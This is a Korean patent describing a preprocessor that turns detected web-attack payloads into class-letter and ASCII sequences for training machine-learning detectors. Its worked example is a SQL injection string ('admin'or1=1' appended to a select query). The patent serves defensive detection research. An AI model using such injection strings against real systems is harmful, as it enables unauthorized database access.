KR102103802B1

KR102103802B1 - Method for generating reconstructed payload data by extracting web attack pattern based on commands of machine learning target system and the preprocessor using the same

Info

Publication number: KR102103802B1
Application number: KR1020190090537A
Authority: KR
Inventors: 강필상; 신강식; 김진; 백만기; 임종혁; 김상현
Original assignee: (주)시큐레이어
Priority date: 2019-07-25
Filing date: 2019-07-25
Publication date: 2020-04-24

Abstract

Disclosed is a method for generating reconstructed payload data by extracting a web attack pattern based on commands of a machine learning target system, the method comprising the steps of: (a) when payload data is obtained, performing, by a preprocessor, a process of tokenizing at least some of the characters, special characters, and numbers included in the payload data, using the special characters as delimiters; (b) performing, by the preprocessor, a process of selecting, from the tokens, a plurality of specific character groups each constituting one of a plurality of commands that are stored in a database and correspond to a specific web attack type; (c) performing, by the preprocessor, processes of (i) determining whether the plurality of specific character groups correspond to the respective components constituting a specific command combination of the specific web attack type and, if they do, substituting each of the plurality of specific character groups with the specific first character representing its class, and (ii) removing from the payload data everything other than the plurality of specific character groups and the special characters; and (d) performing, by the preprocessor, a process of generating reconstructed payload data by substituting each specific first character and each special character with a real number or with a second character corresponding to the real number.

Description

Method for generating reconstructed payload data by extracting web attack pattern based on commands of machine learning target system, and preprocessor using the same

The present invention relates to a method for generating reconstructed payload data by extracting a web attack pattern based on commands of a machine learning target system, and to a preprocessor using the same.

As the web takes up a growing share of corporate work and daily life, attacks targeting it continue to increase.

Accordingly, machine learning is being used in the field of information security to respond to such web attacks more effectively. Examples of this use can be found in, for instance, an article from an Internet media outlet ("Security meets machine learning: five representative use cases", http://www.ciokorea.com/news/36657#csidx82bd9714929774882b9a2c72a9eb12c).

However, the web attacks detected by a security threat detection system fall into hundreds of types, and classifying hundreds of web attack types is difficult for humans and for machine learning alike.

Therefore, there is a need for a method that classifies web attack types more efficiently and provides accurate machine learning data, so that machine learning can perform well when predicting web attacks.

An object of the present invention is to solve all of the problems described above.

Another object of the present invention is to provide a method for generating reconstructed payload data by extracting a web attack pattern based on commands of a machine learning target system, so that data can be processed according to web attack type and pattern and the machine can directly learn even the parts that a person would inspect by eye, thereby enabling efficient machine learning.

Still another object of the present invention is to provide a method for generating reconstructed payload data by extracting a web attack pattern based on commands of a machine learning target system, so that features of various attack patterns are extracted from the web attack types and the exact location of the actual malicious attack is identified, thereby improving the performance of machine learning and the quality of the training data used for machine learning.

The characteristic configuration of the present invention for achieving the objects described above and for realizing the characteristic effects described below is as follows.

According to one aspect of the present invention, there is disclosed a method for generating reconstructed payload data by extracting a web attack pattern based on commands of a machine learning target system, wherein each of a plurality of commands included in the machine learning target system is stored in a database as belonging to at least one of a plurality of classes, the classes being divided, for each of a plurality of web attack types, according to the respective components constituting a combination of commands, and each of the plurality of classes being defined by a first character that differs from class to class, the method comprising the steps of: (a) when payload data is obtained, the payload data being included in security threat data detected by a security threat detection system and the security threat data corresponding to a specific web attack type that is at least one of the plurality of web attack types, performing, by a preprocessor, a process of tokenizing at least some of the characters, special characters, and numbers included in the payload data, using the special characters as delimiters; (b) performing, by the preprocessor, a process of selecting, from among the tokenized characters, the tokenized special characters, and the tokenized numbers, a plurality of specific character groups each constituting one of a plurality of commands that are stored in the database and correspond to the specific web attack type; (c) performing, by the preprocessor, processes of (i) determining whether the plurality of specific character groups correspond to the respective components constituting a specific command combination of the specific web attack type and, if they do, replacing each of the plurality of specific character groups with the specific first character representing its class, and (ii) removing from the payload data everything among the tokenized characters, the tokenized special characters, and the tokenized numbers other than the plurality of specific character groups and the special characters; and (d) performing, by the preprocessor, a process of generating reconstructed payload data by replacing each specific first character and each special character with a real number or with a second character corresponding to the real number.
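
Steps (a) to (d) can be sketched in Python as follows. This is a minimal illustration under stated assumptions, not the patented implementation: the `COMMAND_DB` and `COMBINATIONS` tables, the class letters, and the rule that every class listed for the combination must be present are all hypothetical, and the ASCII code is used in step (d) only because it is one of the encodings the document mentions.

```python
import re

# Hypothetical database: web attack type -> {command: first character of its class}.
COMMAND_DB = {
    "sql_injection": {"select": "A", "union": "A", "from": "B", "where": "C"},
}
# Hypothetical command combination: classes that must all appear for the type.
COMBINATIONS = {"sql_injection": {"A", "B"}}


def tokenize(payload: str) -> list[str]:
    """Step (a): split into letter runs, digit runs, and single special characters."""
    return re.findall(r"[A-Za-z]+|\d+|[^A-Za-z\d\s]", payload)


def reconstruct(payload: str, attack_type: str) -> list[int]:
    class_of = COMMAND_DB[attack_type]
    tokens = tokenize(payload)

    # Step (b): select the tokens that are stored commands for this attack type.
    groups = [t for t in tokens if t.lower() in class_of]

    # Step (c)(i): check the selected groups against the command combination.
    found = {class_of[g.lower()] for g in groups}
    if not COMBINATIONS[attack_type] <= found:
        return []  # no matching combination, nothing to reconstruct

    kept = []
    for t in tokens:
        if t.lower() in class_of:
            kept.append(class_of[t.lower()])  # (c)(i): command -> class letter
        elif not t.isalnum():
            kept.append(t)                    # special characters are kept
        # (c)(ii): every other letter run or number is dropped

    # Step (d): replace each remaining character with a number (its ASCII code).
    return [ord(ch) for ch in kept]


print(reconstruct("id=1' UNION SELECT name FROM users--", "sql_injection"))
```

For the sample payload, only `=`, `'`, `UNION`, `SELECT`, `FROM`, `-`, and `-` survive, and they are encoded as 61, 39, 65, 65, 66, 45, 45. A payload with no matching command combination yields an empty list in this sketch.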

As an example, there is disclosed a method further comprising, after step (d), the step of (e) supporting, by the preprocessor, the input of the generated reconstructed payload data into a machine learning device.

As an example, there is disclosed a method in which, in step (c), the preprocessor (i) determines, for some of the plurality of specific character groups, whether they correspond to at least one of the components constituting the specific command combination of the specific web attack type and, if they do, replaces those specific character groups with a specific 1-1 character representing the corresponding class, and then (ii) determines, for the remaining specific character groups, whether they correspond to the rest of the components constituting the specific command combination of the specific web attack type and, if they do, replaces the remaining specific character groups with a 1-2 character representing the corresponding class, the 1-1 character and the 1-2 character being included in the specific first characters.

As an example, there is disclosed a method in which, in step (c), the preprocessor determines whether the plurality of specific character groups correspond to the respective components constituting the specific command combination of the specific web attack type and, if they do, replaces each of the plurality of specific character groups with the respective 1-1 character and 1-2 character representing the corresponding classes, the 1-1 character and the 1-2 character being included in the specific first characters.

As an example, there is disclosed a method in which, in step (c), whether the plurality of specific character groups correspond to the respective components constituting the specific command combination of the specific web attack type is determined according to whether the plurality of specific character groups fall into at least two of the specific plurality of classes corresponding to the specific command combination of the specific web attack type.

As an example, there is disclosed a method in which the preprocessor (i) continues the process if the plurality of specific character groups fall into at least two of the specific plurality of classes corresponding to the specific command combination of the specific web attack type, and (ii) terminates the process if they do not.
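
The continue-or-terminate rule in the last two examples can be sketched as below. The function name `should_continue`, the `class_of` mapping, and the sample commands and letters are hypothetical; only the "at least two classes" criterion comes from the text.

```python
def should_continue(groups: list[str], class_of: dict[str, str]) -> bool:
    """Return True when the selected character groups fall into at least two classes."""
    distinct_classes = {class_of[g] for g in groups if g in class_of}
    return len(distinct_classes) >= 2


# Hypothetical classes for one attack type: "A" = query verbs, "B" = table clause.
SQLI_CLASSES = {"select": "A", "union": "A", "from": "B"}

print(should_continue(["select", "from"], SQLI_CLASSES))   # two classes: A and B
print(should_continue(["select", "union"], SQLI_CLASSES))  # one class only: A
```

Under these assumptions the first call continues and the second terminates, because two commands from the same class do not form a combination.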

As an example, there is disclosed a method in which the plurality of web attack types include first to n-th web attack types, and the k-th web attack type corresponds to commands that can be classified into a first class to an n_k-th class, these classes being at least some of the plurality of classes and being divided according to the respective components constituting a combination of the commands belonging to the k-th web attack type, where k is an integer from 1 to n.

As an example, there is disclosed a method in which, when the specific web attack type is the k-th web attack type, the preprocessor, in step (c), determines whether the plurality of specific character groups correspond to the respective components constituting the specific command combination of the specific web attack type and, if they do, replaces each of the plurality of specific character groups with the specific 1-1 character to 1-n_k character representing the corresponding one of the first class to the n_k-th class, the 1-1 character to the 1-n_k character being included in the specific first characters.
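
One way to picture the k-th attack type with its n_k classes and the matching 1-1 to 1-n_k characters is the sketch below. The `ATTACK_CLASSES` catalogue, its commands, and the choice of consecutive uppercase letters are assumptions made for illustration; the letters restart for each attack type here, which is a simplification, and the sketch supports at most 26 classes per type.

```python
from string import ascii_uppercase

# Hypothetical catalogue: attack type k -> ordered list of its n_k classes,
# each class being the set of commands that play the same role in a combination.
ATTACK_CLASSES = {
    "sql_injection": [{"select", "union"}, {"from"}, {"where", "having"}],
    "xss": [{"script"}, {"alert", "prompt"}],
}


def first_characters(attack_type: str) -> dict[str, str]:
    """Map every command of the attack type to the letter of its class (A, B, ...)."""
    table = {}
    for letter, commands in zip(ascii_uppercase, ATTACK_CLASSES[attack_type]):
        for command in commands:
            table[command] = letter
    return table


def substitute(groups: list[str], attack_type: str) -> list[str]:
    """Replace each selected character group with the letter of its class."""
    table = first_characters(attack_type)
    return [table[g] for g in groups]


print(substitute(["union", "select", "from", "where"], "sql_injection"))
```

With this catalogue, `union` and `select` share the letter of the first class, while `from` and `where` receive the letters of the second and third classes.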

As an example, there is disclosed a method in which the security threat detection system collects a plurality of detection log data included in the detected security threat data and determines, from the collected detection log data, that the data corresponds to the specific web attack type among the plurality of web attack types.

As an example, there is disclosed a method in which the first character is a real number or a character that can be replaced with a real number.

As an example, there is disclosed a method in which the second character is a character that can be used for machine learning.

As an example, there is disclosed a method in which the first character is a letter of the alphabet and the second character is an ASCII code.

According to another aspect of the present invention, there is disclosed a preprocessor for generating reconstructed payload data by extracting a web attack pattern based on commands of a machine learning target system, the preprocessor comprising: a database in which each of a plurality of commands included in the machine learning target system is stored as belonging to at least one of a plurality of classes, the classes being divided, for each of a plurality of web attack types, according to the respective components constituting a combination of commands, and each of the plurality of classes being defined by a first character that differs from class to class; at least one memory that stores instructions; and at least one processor configured to execute the instructions, wherein the processor performs: (1) a process of, when payload data is obtained, the payload data being included in security threat data detected by a security threat detection system and the security threat data corresponding to a specific web attack type that is at least one of the plurality of web attack types, tokenizing at least some of the characters, special characters, and numbers included in the payload data, using the special characters as delimiters; (2) a process of selecting, from among the tokenized characters, the tokenized special characters, and the tokenized numbers, a plurality of specific character groups each constituting one of a plurality of commands that are stored in the database and correspond to the specific web attack type; (3) a process of determining whether the plurality of specific character groups correspond to the respective components constituting a specific command combination of the specific web attack type and, if they do, replacing each of the plurality of specific character groups with the specific first character representing its class, and removing from the payload data everything among the tokenized characters, the tokenized special characters, and the tokenized numbers other than the plurality of specific character groups and the special characters; and (4) a process of generating reconstructed payload data by replacing each specific first character and each special character with a real number or with a second character corresponding to the real number.

As an example, there is disclosed a preprocessor in which the processor further performs, after process (4), (5) a process of supporting the input of the generated reconstructed payload data into a machine learning device.

As an example, there is disclosed a preprocessor in which the processor, in process (3), (i) determines, for some of the plurality of specific character groups, whether they correspond to at least one of the components constituting the specific command combination of the specific web attack type and, if they do, replaces those specific character groups with a specific 1-1 character representing the corresponding class, and then (ii) determines, for the remaining specific character groups, whether they correspond to the rest of the components constituting the specific command combination of the specific web attack type and, if they do, replaces the remaining specific character groups with a 1-2 character representing the corresponding class, the 1-1 character and the 1-2 character being included in the specific first characters.

As an example, there is disclosed a preprocessor in which the processor, in process (3), determines whether the plurality of specific character groups correspond to the respective components constituting the specific command combination of the specific web attack type and, if they do, replaces each of the plurality of specific character groups with the respective 1-1 character and 1-2 character representing the corresponding classes, the 1-1 character and the 1-2 character being included in the specific first characters.

As an example, there is disclosed a preprocessor in which, in process (3), whether the plurality of specific character groups correspond to the respective components constituting the specific command combination of the specific web attack type is determined according to whether the plurality of specific character groups fall into at least two of the specific plurality of classes corresponding to the specific command combination of the specific web attack type.

As an example, there is disclosed a preprocessor in which the processor (i) continues the process if the plurality of specific character groups fall into at least two of the specific plurality of classes corresponding to the specific command combination of the specific web attack type, and (ii) terminates the process if they do not.

As an example, there is disclosed a preprocessor in which the plurality of web attack types include first to n-th web attack types, and the k-th web attack type corresponds to commands that can be classified into a first class to an n_k-th class, these classes being at least some of the plurality of classes and being divided according to the respective components constituting a combination of the commands belonging to the k-th web attack type, where k is an integer from 1 to n.

As an example, there is disclosed a preprocessor in which, when the specific web attack type is the k-th web attack type, the processor, in process (3), determines whether the plurality of specific character groups correspond to the respective components constituting the specific command combination of the specific web attack type and, if they do, replaces each of the plurality of specific character groups with the specific 1-1 character to 1-n_k character representing the corresponding one of the first class to the n_k-th class, the 1-1 character to the 1-n_k character being included in the specific first characters.

As an example, there is disclosed a preprocessor in which the security threat detection system collects a plurality of detection log data included in the detected security threat data and determines, from the collected detection log data, that the data corresponds to the specific web attack type among the plurality of web attack types.

As an example, there is disclosed a preprocessor in which the first character is a real number or a character that can be replaced with a real number.

As an example, there is disclosed a preprocessor in which the second character is a character that can be used for machine learning.

As an example, there is disclosed a preprocessor in which the first character is a letter of the alphabet and the second character is an ASCII code.

The present invention has the following effects.

By providing a method for generating reconstructed payload data by extracting a web attack pattern based on commands of a machine learning target system, the present invention makes it possible to process data according to web attack type and pattern and allows the machine to directly learn even the parts that a person would inspect by eye, thereby enabling efficient machine learning.

In addition, by providing such a method, the present invention extracts features of various attack patterns from the web attack types and identifies the exact location of the actual malicious attack, thereby improving the performance of machine learning and the quality of the training data used for machine learning.

FIG. 1 is a diagram showing an example for explaining the schematic configuration of a conventional method in which a security threat detection system detects a web attack and provides information about the detected web attack to a machine learning system as training data.
FIG. 2 is a diagram showing the schematic configuration of a preprocessor, according to an embodiment of the present invention, that generates reconstructed payload data by extracting a web attack pattern based on commands of a machine learning target system.
FIG. 3 is a diagram showing an example for explaining the schematic configuration of a method, according to an embodiment of the present invention, in which a security threat detection system detects a web attack and provides information about the detected web attack to a machine learning system as training data.
FIG. 4 is a diagram for explaining the schematic sequence of a method for generating reconstructed payload data by extracting a web attack pattern based on commands of a machine learning target system.

후술하는 본 발명에 대한 상세한 설명은, 본 발명이 실시될 수 있는 특정 실시예를 예시로서 도시하는 첨부 도면을 참조한다. 이들 실시예는 당업자가 본 발명을 실시할 수 있기에 충분하도록 상세히 설명된다. 본 발명의 다양한 실시예는 서로 다르지만 상호 배타적일 필요는 없음이 이해되어야 한다. 예를 들어, 여기에 기재되어 있는 특정 형상, 구조 및 특성은 일 실시예에 관련하여 본 발명의 정신 및 범위를 벗어나지 않으면서 다른 실시예로 구현될 수 있다. 또한, 각각의 개시된 실시예 내의 개별 구성요소의 위치 또는 배치는 본 발명의 정신 및 범위를 벗어나지 않으면서 변경될 수 있음이 이해되어야 한다. 따라서, 후술하는 상세한 설명은 한정적인 의미로서 취하려는 것이 아니며, 본 발명의 범위는, 적절하게 설명된다면, 그 청구항들이 주장하는 것과 균등한 모든 범위와 더불어 첨부된 청구항에 의해서만 한정된다. 도면에서 유사한 참조부호는 여러 측면에 걸쳐서 동일하거나 유사한 기능을 지칭한다.For a detailed description of the present invention, which will be described later, reference is made to the accompanying drawings that illustrate, by way of example, specific embodiments in which the invention may be practiced. These examples are described in detail enough to enable those skilled in the art to practice the present invention. It should be understood that the various embodiments of the present invention are different, but need not be mutually exclusive. For example, certain shapes, structures, and properties described herein may be implemented in other embodiments without departing from the spirit and scope of the invention in relation to one embodiment. In addition, it should be understood that the location or placement of individual components within each disclosed embodiment can be changed without departing from the spirit and scope of the invention. Therefore, the following detailed description is not intended to be taken in a limiting sense, and the scope of the present invention, if appropriately described, is limited only by the appended claims, along with all ranges equivalent to those claimed. In the drawings, similar reference numerals refer to the same or similar functions across various aspects.

Hereinafter, preferred embodiments of the present invention will be described in detail with reference to the accompanying drawings so that those of ordinary skill in the art to which the invention pertains can easily practice it.

In addition, in the present invention, "pattern" is used to cover both the kind of web attack and the form of the commands through which an attack can be carried out, and "type" is used to mean the different kinds of web attacks.

FIG. 1 is a diagram illustrating an example for explaining the schematic configuration of a conventional method in which a security threat detection system detects a web attack and provides information about the detected web attack to a machine learning system as training data.

In the conventional method, the commands corresponding to each web attack type are classified in advance. When a web attack is actually detected, the detected data is provided to the machine learning system as training data as long as any one of the words it contains matches one of the commands classified under a web attack type.

For example, referring to FIG. 1, suppose the web attack classification 110 is divided into Cross-Site Scripting (111), SQL Injection (112), File upload (113), and so on, and the web attack data actually detected by the security threat detection system contains "select". Because "select" is one of the commands classified under SQL Injection (112), the web attack type of the detected data is judged to be SQL Injection (112), the data is judged to be an attack containing "select", and it is provided to the machine learning system.

However, if the target of the web attack is a DB system, "select" is a command that cannot be executed on its own in the DB system and must be combined with "from". Even when the detected web attack data contains "select" but not "from", the conventional method still judges the web attack type to be SQL Injection (112) and the data to be an attack containing "select", and provides it to the machine learning system, so the system may end up learning unnecessary data.
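
The shortcoming of the conventional method can be illustrated with a minimal sketch. The keyword table and the function name `conventional_match` are hypothetical; only the presence of "select" under SQL Injection is taken from the description above.

```python
# Hypothetical keyword table; only "select" under SQL Injection comes from the text.
KEYWORDS_BY_TYPE = {
    "SQL Injection": {"select"},
}

def conventional_match(detected_data):
    """Return every attack type for which any single keyword appears as a word."""
    words = set(detected_data.lower().split())
    return [attack_type
            for attack_type, keywords in KEYWORDS_BY_TYPE.items()
            if words & keywords]

# "select" appears without "from", so a DB system could not execute it,
# yet the single-keyword rule still labels the data as SQL Injection.
print(conventional_match("please select a seat"))
```

Under this rule a single matching word is enough, which is the source of the unnecessary training data described above.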

Therefore, the present invention, which remedies this problem, is described in detail below.

FIG. 2 is a diagram showing the schematic configuration of a preprocessor 200 that extracts a web attack pattern based on the commands of a machine learning target system and generates reconstructed payload data, according to an embodiment of the present invention.

As shown in FIG. 2, the preprocessor 200 of the present invention may include a memory 210 and a processor 220.

The memory 210 of the preprocessor 200 may store instructions for the processor 220. Specifically, the instructions are code generated to cause the preprocessor 200 to function in a particular manner, and may be stored in a computer-usable or computer-readable memory that can direct a computer or other programmable data processing equipment. The instructions may carry out processes for performing the functions described in this specification.

The processor 220 of the preprocessor 200 may include hardware components such as an MPU (Micro Processing Unit) or CPU (Central Processing Unit), a cache memory, and a data bus. It may further include software components such as an operating system and applications that serve specific purposes.

In addition, the preprocessor 200 may operate in conjunction with a database 900 containing the information used to extract web attack patterns based on the commands of the machine learning target system and to generate the reconstructed payload data. Here, the database 900 may include at least one type of storage medium among a flash memory type, a hard disk type, a multimedia card micro type, a card-type memory (for example, SD or XD memory), RAM (Random Access Memory), SRAM (Static Random Access Memory), ROM (Read-Only Memory), EEPROM (Electrically Erasable Programmable Read-Only Memory), PROM (Programmable Read-Only Memory), magnetic memory, a magnetic disk, and an optical disk, but is not limited thereto and may include any medium capable of storing data. The database 900 may be installed separately from the preprocessor 200 or, alternatively, installed inside the preprocessor 200 to transmit data or record received data. Unlike what is illustrated, it may also be implemented as two or more separate databases, depending on the conditions under which the invention is practiced.

To extract a web attack pattern based on the commands of the machine learning target system and generate reconstructed payload data using such a preprocessor 200, each of the plurality of commands included in the machine learning target system must first be stored in the database 900 as belonging to at least one of a plurality of classes, which are divided, for each of a plurality of web attack types, according to the components that make up a command combination. Each of the plurality of classes may be defined by a first character that differs from class to class. However, this is not a limitation, and classes belonging to different web attack types may be defined by the same first character. This is described below with reference to FIG. 3.

FIG. 3 is a diagram illustrating an example for explaining the schematic configuration of a method in which a security threat detection system detects a web attack and provides information about the detected web attack to a machine learning system as training data, according to an embodiment of the present invention.

Referring to FIG. 3, the web attack classification 330 may include Cross-Site Scripting (331), SQL Injection (332), File download (333), File upload (334), and so on, but is not limited thereto and may include every type of web attack.

Here, the commands corresponding to Cross-Site Scripting (331) may be stored in the database 900 divided, according to the components that make up a command combination, into A Class, B Class, C Class, and D Class, which are classes defined by the letters A, B, C, and D, respectively. However, this is not a limitation, and the commands may be divided into more classes depending on the command combination.

Likewise, the commands corresponding to SQL Injection (332) may be stored in the database 900 divided, according to the components that make up a command combination, into A Class, B Class, C Class, and D Class, which are classes defined by the letters A, B, C, and D, respectively. However, this is not a limitation, and the commands may be divided into more classes depending on the command combination.

In addition, one command of the combination may be stored per class according to the components that make up the command combination, as when "select" is stored in A Class of SQL Injection (332), "from" in B Class, "where" in C Class, and "or" in D Class. However, this is not a limitation, and at least two of the components that make up the command combination may be stored in one class, as when "select" and "from" are stored in A Class and "where" and "or" are stored in B Class.
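
The two storage layouts described above might be represented as follows. This is only a sketch: the dictionary layout, the names `CLASS_TABLE`, `CLASS_TABLE_GROUPED`, and `class_of` are assumptions standing in for the database 900, and only the SQL Injection entries are taken from the description.

```python
# Hypothetical in-memory stand-in for database 900.
# Layout 1: one command per class (A: select, B: from, C: where, D: or).
CLASS_TABLE = {
    "SQL Injection": {
        "A": {"select"},
        "B": {"from"},
        "C": {"where"},
        "D": {"or"},
    },
}

# Layout 2: at least two commands per class, as in the alternative above.
CLASS_TABLE_GROUPED = {
    "SQL Injection": {
        "A": {"select", "from"},
        "B": {"where", "or"},
    },
}

def class_of(table, attack_type, command):
    """Return the class letter (the first character) for a command, or None."""
    for letter, commands in table.get(attack_type, {}).items():
        if command.lower() in commands:
            return letter
    return None

print(class_of(CLASS_TABLE, "SQL Injection", "where"))          # C
print(class_of(CLASS_TABLE_GROUPED, "SQL Injection", "where"))  # B
```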

With each of the plurality of commands included in the machine learning target system thus stored in the database 900 as belonging to at least one of the plurality of classes divided, for each web attack type, according to the components that make up a command combination, the method by which the preprocessor 200 extracts a web attack pattern based on the commands of the machine learning target system and generates reconstructed payload data is described below with reference to FIG. 4.

First, the preprocessor 200 may acquire payload data (S410).

The payload data may be contained in security threat data detected by the security threat detection system.

In addition, the security threat data may correspond to a specific web attack type, that is, to at least one of the plurality of web attack types stored in the database 900.

Here, the security threat detection system may collect a plurality of detection log data included in the detected security threat data and, using the collected detection log data, determine that the data is of the specific web attack type among the plurality of web attack types.

The preprocessor 200 may then tokenize at least some of the characters, special characters, and numbers included in the acquired payload data, using the special characters as delimiters (S420).

For example, if the acquired payload data is select id,pw from table where id=admin'or1=1, the preprocessor 200 may tokenize it on the special characters it contains, yielding select id , pw from table where id = admin ' or1 = 1. The spaces placed before and after each special character here merely indicate the token boundaries, and the tokenization is not limited to this representation.
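
The tokenization of step S420 can be sketched with a regular expression. The function name `tokenize` and the choice of pattern are assumptions; the sketch treats any character that is neither a letter, a digit, an underscore, nor whitespace as a special character.

```python
import re

def tokenize(payload):
    # A token is either a run of letters/digits/underscores
    # or a single special character; whitespace only separates tokens.
    return re.findall(r"\w+|[^\w\s]", payload)

tokens = tokenize("select id,pw from table where id=admin'or1=1")
print(" ".join(tokens))
# select id , pw from table where id = admin ' or1 = 1
```

Joining the tokens with spaces reproduces the representation used in the example above, including the single token or1.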

Next, from among the tokenized characters, tokenized special characters, and tokenized numbers, the preprocessor 200 may select a plurality of specific character groups that constitute the plurality of commands corresponding to the specific web attack type stored in the database 900 (S430).

For example, assuming the tokenized payload data is select id , pw from table where id = admin ' or1 = 1 and the commands are stored in the database 900 as shown in FIG. 3, the preprocessor 200 may select from it "select", "from", "where", and "or", the specific character groups that each constitute one of the commands included in SQL Injection (332), the specific web attack type.
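
A possible sketch of the selection in step S430 follows. The description does not state how "or" is recovered from the token or1, so this sketch assumes, as one option, that runs of letters and runs of digits are separated before the lookup. The names `SQL_INJECTION_COMMANDS`, `tokenize`, and `select_command_groups` are hypothetical.

```python
import re

# Commands stored for SQL Injection (332) in the example of FIG. 3.
SQL_INJECTION_COMMANDS = {"select", "from", "where", "or"}

def tokenize(payload):
    # Assumption: letters, digits, and special characters each form
    # their own tokens, so "or1" becomes "or" and "1".
    return re.findall(r"[A-Za-z]+|\d+|[^A-Za-z\d\s]", payload)

def select_command_groups(tokens, commands):
    # Keep only the tokens that match a stored command (case-insensitive).
    return [tok for tok in tokens if tok.lower() in commands]

tokens = tokenize("select id,pw from table where id=admin'or1=1")
selected = select_command_groups(tokens, SQL_INJECTION_COMMANDS)
print(selected)  # ['select', 'from', 'where', 'or']
```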

Next, the preprocessor 200 may determine whether the plurality of specific character groups correspond to the respective components that make up a specific command combination of the specific web attack type. If they do, it may substitute each of the specific character groups with the specific first character representing the class to which it belongs, and remove from the payload data everything among the tokenized characters, tokenized special characters, and tokenized numbers other than the specific character groups and the special characters (S440).

Here, the first character may be a real number or a character that can be substituted with a real number. The real number or the character that can be substituted with a real number may include letters of the alphabet.

For example, if the commands are stored in the database 900 as shown in FIG. 3 and the tokenized payload data is select id , pw from table where id = admin ' or1 = 1, the specific character groups are "select", "from", "where", and "or". Because these correspond to the respective components that make up a command combination of SQL Injection (332), the specific web attack type shown in FIG. 3, "select" may be substituted with the letter A, "from" with the letter B, "where" with the letter C, and "or" with the letter D. In addition, everything in the tokenized payload data other than the specific character groups "select", "from", "where", and "or" and the special characters ",", "=", "'", and "=" may be removed. After step S440, the tokenized payload data select id , pw from table where id = admin ' or1 = 1 may therefore be expressed as A,BC='D=.
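
The substitution and removal of step S440 can be sketched as below. The mapping `CLASS_OF` mirrors the FIG. 3 example; the function name `substitute_and_strip` and the tokenizing pattern (which splits letters from digits so that "or" can be matched inside or1) are assumptions of this sketch.

```python
import re

# Class letters (first characters) for SQL Injection (332) in the example.
CLASS_OF = {"select": "A", "from": "B", "where": "C", "or": "D"}

def substitute_and_strip(payload):
    # Assumed tokenization: letter runs, digit runs, single special characters.
    tokens = re.findall(r"[A-Za-z]+|\d+|[^A-Za-z\d\s]", payload)
    kept = []
    for tok in tokens:
        letter = CLASS_OF.get(tok.lower())
        if letter is not None:
            kept.append(letter)   # command -> class letter
        elif not tok.isalnum():
            kept.append(tok)      # special characters are kept as-is
        # every other word or number is removed
    return "".join(kept)

print(substitute_and_strip("select id,pw from table where id=admin'or1=1"))
# A,BC='D=
```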

In this case, the preprocessor 200 may first determine whether the plurality of specific character groups correspond to the respective components that make up the specific command combination of the specific web attack type and, if they do, substitute each of the specific character groups with the specific first character representing the class to which it belongs, and only afterwards remove from the payload data everything among the tokenized characters, tokenized special characters, and tokenized numbers other than the specific character groups and the special characters. However, the order is not limited to this.

Accordingly, the preprocessor 200 may instead first remove from the payload data everything among the tokenized characters, tokenized special characters, and tokenized numbers other than the specific character groups and the special characters, and then determine whether the specific character groups correspond to the respective components that make up the specific command combination of the specific web attack type and, if they do, substitute each of the specific character groups with the specific first character representing the class to which it belongs.

Next, the preprocessor 200 may generate reconstructed payload data by substituting each substituted specific first character and each special character with a real number or with a second character corresponding to the real number (S450).

Here, the second character may be a character usable for machine learning. Such characters may include ASCII codes, hexadecimal codes, and the like, but are not limited thereto.

In addition, when the first character is a letter of the alphabet and the second character is an ASCII code, the letters and special characters may be substituted using the ASCII table. Because the ASCII table is widely known and easy to look up, its description is omitted here.

For example, when the first character is a letter of the alphabet and the second character is an ASCII code, the payload data expressed as A,BC='D= after step S440 may be substituted, using the ASCII table, with 65 44 66 67 61 39 68 61.
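
For the ASCII case, step S450 reduces to a per-character code lookup. The following minimal sketch uses Python's built-in `ord`; the function name `to_ascii_codes` is hypothetical.

```python
def to_ascii_codes(reduced):
    # ord() returns the code point, which equals the ASCII code
    # for letters and the special characters used here.
    return [ord(ch) for ch in reduced]

codes = to_ascii_codes("A,BC='D=")
print(" ".join(str(c) for c in codes))
# 65 44 66 67 61 39 68 61
```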

Meanwhile, after performing steps S410 to S450, the preprocessor 200 may support input of the generated reconstructed payload data into a machine learning device.

Meanwhile, in step S440, the preprocessor 200 may first determine, for some of the plurality of specific character groups, whether they correspond to at least one of the components that make up the specific command combination of the specific web attack type and, if they do, substitute those character groups with a specific 1-1 character representing the corresponding class. It may then determine, for the remaining specific character groups, whether they correspond to the remaining components of the specific command combination and, if they do, substitute them with a 1-2 character representing the corresponding class. Here, the 1-1 character and the 1-2 character may be included among the specific first characters. Although only the 1-1 character and the 1-2 character are mentioned above, this is not a limitation, and a 1-3 character, a 1-4 character, and so on may further be included as needed.

For example, assuming the specific character groups are "select", "from", "where", and "or", the preprocessor 200 may first determine whether "select" and "from" each correspond to a component of the command combination of SQL Injection (332), the specific web attack type shown in FIG. 3, and substitute them with the letters A and B representing their respective classes. The preprocessor 200 may then determine whether "where" and "or" each correspond to a component of the command combination of SQL Injection (332) and substitute them with the letters C and D representing their respective classes. Here, the first characters are letters of the alphabet: the 1-1 character is A, the 1-2 character is B, the 1-3 character is C, and the 1-4 character is D. The specific character groups may be substituted sequentially in the order in which the commands are executed, but this is not a limitation.

Meanwhile, in step S440, the preprocessor 200 may instead first determine whether all of the specific character groups correspond to the respective components that make up the specific command combination of the specific web attack type and then, if they do, substitute each of the specific character groups with the 1-1 character, the 1-2 character, and so on representing its class. Here, the 1-1 character and the 1-2 character may be included among the specific first characters. Although only the 1-1 character and the 1-2 character are mentioned above, this is not a limitation, and a 1-3 character, a 1-4 character, and so on may further be included as needed.

For example, assuming the specific character groups are "select", "from", "where", and "or", the preprocessor 200 may first determine for all of them whether they correspond to the respective components of the command combination of SQL Injection (332), the specific web attack type shown in FIG. 3, and then substitute them with the letters A, B, C, and D representing their respective classes. That is, "select" may be substituted with the letter A, "from" with the letter B, "where" with the letter C, and "or" with the letter D. The specific character groups may be substituted sequentially in the order in which the commands are executed, but this is not a limitation.

Meanwhile, in step S440, whether the plurality of specific character groups correspond to the respective components that make up the specific command combination of the specific web attack type may be decided by whether the specific character groups are included in at least two of the specific plurality of classes corresponding to that command combination.

Here, if the plurality of specific character groups are included in at least two of the specific plurality of classes corresponding to the specific command combination of the specific web attack type, the preprocessor 200 may continue the process.

Conversely, if the plurality of specific character groups are not included in at least two of the specific plurality of classes corresponding to the specific command combination of the specific web attack type, the preprocessor 200 may terminate the process.

For example, assuming the specific character groups are "select" and "where", they are included in A Class and B Class among A Class, B Class, C Class, and D Class, the classes corresponding to the command combination of SQL Injection (332), the specific web attack type shown in FIG. 3. The preprocessor 200 will therefore continue the process.

As another example, assuming the specific character groups are "http" and "board", both are included only in A Class among A Class, B Class, C Class, and D Class, the classes corresponding to the command combination of File Download (333), the specific web attack type shown in FIG. 3. The preprocessor 200 will therefore terminate the process.
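
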